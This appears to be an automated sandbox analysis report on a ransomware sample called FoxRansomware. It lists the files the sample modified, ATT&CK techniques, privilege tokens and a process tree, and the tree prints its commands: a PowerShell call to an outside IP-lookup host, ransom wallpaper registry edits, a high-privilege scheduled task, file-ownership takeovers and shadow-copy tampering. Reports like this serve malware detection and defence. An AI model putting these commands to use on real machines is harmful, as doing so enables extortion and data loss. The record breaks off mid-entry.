File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\hi.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ru.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\nn.pak.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\fonts\LucidaBrightDemiItalic.ttf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\TraceSuspend.TTS	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\es-419.pak.DATA	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\hr.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

6356 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

6780 vssadmin.exe

pid	process
6356	schtasks.exe

pid	process
6780	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exeK91plEdw64.exe

pid	process
3196	powershell.exe
3196	powershell.exe
3196	powershell.exe
8316	K91plEdw64.exe
8316	K91plEdw64.exe
8316	K91plEdw64.exe
8316	K91plEdw64.exe
8316	K91plEdw64.exe
8316	K91plEdw64.exe
8316	K91plEdw64.exe
8316	K91plEdw64.exe
8316	K91plEdw64.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

K91plEdw64.exe

pid process

8316 K91plEdw64.exe

pid	process
8316	K91plEdw64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeK91plEdw64.exevssvc.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeDebugPrivilege	8316	K91plEdw64.exe
Token: SeLoadDriverPrivilege	8316	K91plEdw64.exe
Token: SeBackupPrivilege	7400	vssvc.exe
Token: SeRestorePrivilege	7400	vssvc.exe
Token: SeAuditPrivilege	7400	vssvc.exe
Token: SeIncreaseQuotaPrivilege	7852	WMIC.exe
Token: SeSecurityPrivilege	7852	WMIC.exe
Token: SeTakeOwnershipPrivilege	7852	WMIC.exe
Token: SeLoadDriverPrivilege	7852	WMIC.exe
Token: SeSystemProfilePrivilege	7852	WMIC.exe
Token: SeSystemtimePrivilege	7852	WMIC.exe
Token: SeProfSingleProcessPrivilege	7852	WMIC.exe
Token: SeIncBasePriorityPrivilege	7852	WMIC.exe
Token: SeCreatePagefilePrivilege	7852	WMIC.exe
Token: SeBackupPrivilege	7852	WMIC.exe
Token: SeRestorePrivilege	7852	WMIC.exe
Token: SeShutdownPrivilege	7852	WMIC.exe
Token: SeDebugPrivilege	7852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7852	WMIC.exe
Token: SeRemoteShutdownPrivilege	7852	WMIC.exe
Token: SeUndockPrivilege	7852	WMIC.exe
Token: SeManageVolumePrivilege	7852	WMIC.exe
Token: 33	7852	WMIC.exe
Token: 34	7852	WMIC.exe
Token: 35	7852	WMIC.exe
Token: 36	7852	WMIC.exe
Token: SeIncreaseQuotaPrivilege	7852	WMIC.exe
Token: SeSecurityPrivilege	7852	WMIC.exe
Token: SeTakeOwnershipPrivilege	7852	WMIC.exe
Token: SeLoadDriverPrivilege	7852	WMIC.exe
Token: SeSystemProfilePrivilege	7852	WMIC.exe
Token: SeSystemtimePrivilege	7852	WMIC.exe
Token: SeProfSingleProcessPrivilege	7852	WMIC.exe
Token: SeIncBasePriorityPrivilege	7852	WMIC.exe
Token: SeCreatePagefilePrivilege	7852	WMIC.exe
Token: SeBackupPrivilege	7852	WMIC.exe
Token: SeRestorePrivilege	7852	WMIC.exe
Token: SeShutdownPrivilege	7852	WMIC.exe
Token: SeDebugPrivilege	7852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7852	WMIC.exe
Token: SeRemoteShutdownPrivilege	7852	WMIC.exe
Token: SeUndockPrivilege	7852	WMIC.exe
Token: SeManageVolumePrivilege	7852	WMIC.exe
Token: 33	7852	WMIC.exe
Token: 34	7852	WMIC.exe
Token: 35	7852	WMIC.exe
Token: 36	7852	WMIC.exe
Token: SeTakeOwnershipPrivilege	6912	takeown.exe
Token: SeTakeOwnershipPrivilege	8564	takeown.exe
Token: SeTakeOwnershipPrivilege	8948	takeown.exe
Token: SeTakeOwnershipPrivilege	8932	takeown.exe
Token: SeTakeOwnershipPrivilege	8252	takeown.exe
Token: SeTakeOwnershipPrivilege	8492	takeown.exe
Token: SeTakeOwnershipPrivilege	7996	takeown.exe
Token: SeTakeOwnershipPrivilege	6212	takeown.exe
Token: SeTakeOwnershipPrivilege	6876	takeown.exe
Token: SeTakeOwnershipPrivilege	7736	takeown.exe
Token: SeTakeOwnershipPrivilege	780	takeown.exe
Token: SeTakeOwnershipPrivilege	7768	takeown.exe
Token: SeTakeOwnershipPrivilege	5344	takeown.exe
Token: SeTakeOwnershipPrivilege	7232	takeown.exe
Token: SeTakeOwnershipPrivilege	3240	takeown.exe
Token: SeTakeOwnershipPrivilege	5628	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.execmd.execmd.exewscript.execmd.execmd.execmd.execmd.exeK91plEdw.execmd.exe

description	pid	process	target process
PID 4724 wrote to memory of 896	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 896	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 896	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 3344	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWrZTmHr.exe
PID 4724 wrote to memory of 3344	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWrZTmHr.exe
PID 4724 wrote to memory of 3344	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	NWrZTmHr.exe
PID 4724 wrote to memory of 3972	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 3972	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 3972	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 3972 wrote to memory of 3196	3972	cmd.exe	powershell.exe
PID 3972 wrote to memory of 3196	3972	cmd.exe	powershell.exe
PID 3972 wrote to memory of 3196	3972	cmd.exe	powershell.exe
PID 4724 wrote to memory of 4228	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 4228	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 4228	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 448	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 448	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 448	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4228 wrote to memory of 3328	4228	cmd.exe	reg.exe
PID 4228 wrote to memory of 3328	4228	cmd.exe	reg.exe
PID 4228 wrote to memory of 3328	4228	cmd.exe	reg.exe
PID 448 wrote to memory of 3136	448	cmd.exe	wscript.exe
PID 448 wrote to memory of 3136	448	cmd.exe	wscript.exe
PID 448 wrote to memory of 3136	448	cmd.exe	wscript.exe
PID 4228 wrote to memory of 4516	4228	cmd.exe	reg.exe
PID 4228 wrote to memory of 4516	4228	cmd.exe	reg.exe
PID 4228 wrote to memory of 4516	4228	cmd.exe	reg.exe
PID 4724 wrote to memory of 5684	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 5684	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 4724 wrote to memory of 5684	4724	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe	cmd.exe
PID 3136 wrote to memory of 5584	3136	wscript.exe	cmd.exe
PID 3136 wrote to memory of 5584	3136	wscript.exe	cmd.exe
PID 3136 wrote to memory of 5584	3136	wscript.exe	cmd.exe
PID 4228 wrote to memory of 5400	4228	cmd.exe	reg.exe
PID 4228 wrote to memory of 5400	4228	cmd.exe	reg.exe
PID 4228 wrote to memory of 5400	4228	cmd.exe	reg.exe
PID 5584 wrote to memory of 6356	5584	cmd.exe	schtasks.exe
PID 5584 wrote to memory of 6356	5584	cmd.exe	schtasks.exe
PID 5584 wrote to memory of 6356	5584	cmd.exe	schtasks.exe
PID 5684 wrote to memory of 5368	5684	cmd.exe	cacls.exe
PID 5684 wrote to memory of 5368	5684	cmd.exe	cacls.exe
PID 5684 wrote to memory of 5368	5684	cmd.exe	cacls.exe
PID 5684 wrote to memory of 7420	5684	cmd.exe	takeown.exe
PID 5684 wrote to memory of 7420	5684	cmd.exe	takeown.exe
PID 5684 wrote to memory of 7420	5684	cmd.exe	takeown.exe
PID 3136 wrote to memory of 5920	3136	wscript.exe	cmd.exe
PID 3136 wrote to memory of 5920	3136	wscript.exe	cmd.exe
PID 3136 wrote to memory of 5920	3136	wscript.exe	cmd.exe
PID 5920 wrote to memory of 9196	5920	cmd.exe	schtasks.exe
PID 5920 wrote to memory of 9196	5920	cmd.exe	schtasks.exe
PID 5920 wrote to memory of 9196	5920	cmd.exe	schtasks.exe
PID 5684 wrote to memory of 8220	5684	cmd.exe	cmd.exe
PID 5684 wrote to memory of 8220	5684	cmd.exe	cmd.exe
PID 5684 wrote to memory of 8220	5684	cmd.exe	cmd.exe
PID 8220 wrote to memory of 8276	8220	cmd.exe	K91plEdw.exe
PID 8220 wrote to memory of 8276	8220	cmd.exe	K91plEdw.exe
PID 8220 wrote to memory of 8276	8220	cmd.exe	K91plEdw.exe
PID 8276 wrote to memory of 8316	8276	K91plEdw.exe	K91plEdw64.exe
PID 8276 wrote to memory of 8316	8276	K91plEdw.exe	K91plEdw64.exe
PID 6068 wrote to memory of 6780	6068	cmd.exe	cmd.exe
PID 6068 wrote to memory of 6780	6068	cmd.exe	cmd.exe
PID 6068 wrote to memory of 7852	6068	cmd.exe	WMIC.exe
PID 6068 wrote to memory of 7852	6068	cmd.exe	WMIC.exe
PID 6068 wrote to memory of 6500	6068	cmd.exe	bcdedit.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4724
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWrZTmHr.exe"
  2⤵
  PID:896
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWrZTmHr.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWrZTmHr.exe" -n
  2⤵
  - Executes dropped EXE
  PID:3344
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Nl5Yy8XP.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3972
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3196
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\0P7hyz2K.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4228
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\0P7hyz2K.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:3328
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:5400
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\6JGMEJxE.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:448
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\6JGMEJxE.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3136
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\XvzRjL1W.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5584
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\XvzRjL1W.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:6356
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5920
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:9196
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"
    3⤵
    PID:7420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:8220
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:8276
    - - C:\Users\Admin\AppData\Local\Temp\K91plEdw64.exe
        
        K91plEdw.exe -accepteula "classes.jsa" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:8316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:6348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:6228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "store.db" -nobanner
    3⤵
    PID:6652
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:8200
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""
  2⤵
  PID:8424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C
    3⤵
    PID:8456
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"
    3⤵
    - Modifies file permissions
    PID:8512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "ActivitiesCache.db" -nobanner
    3⤵
    PID:8484
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "ActivitiesCache.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:8520
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""
  2⤵
  PID:9032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml" /E /G Admin:F /C
    3⤵
    PID:9036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
    3⤵
    PID:8584
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "AssemblyList_4_extended.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:8892
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8684
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:8644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:9016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:8748
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "watermark.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:6704
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:6692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:8928
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:8712
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "resource.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:7444
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7456
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""
  2⤵
  PID:6648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C
    3⤵
    PID:8716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:8252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
    3⤵
    PID:5140
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:8288
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""
  2⤵
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:8492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:6540
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""
  2⤵
  PID:3992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:4048
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
    3⤵
    PID:2300
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
      4⤵
      Executes dropped EXE
      PID:1800
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
    K91plEdw.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Ul5J68Iy.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:6940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:7372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c K91plEdw.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:6300
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
      K91plEdw.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      Executes dropped EXE
      PID:8032
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\K91plEdw.exe
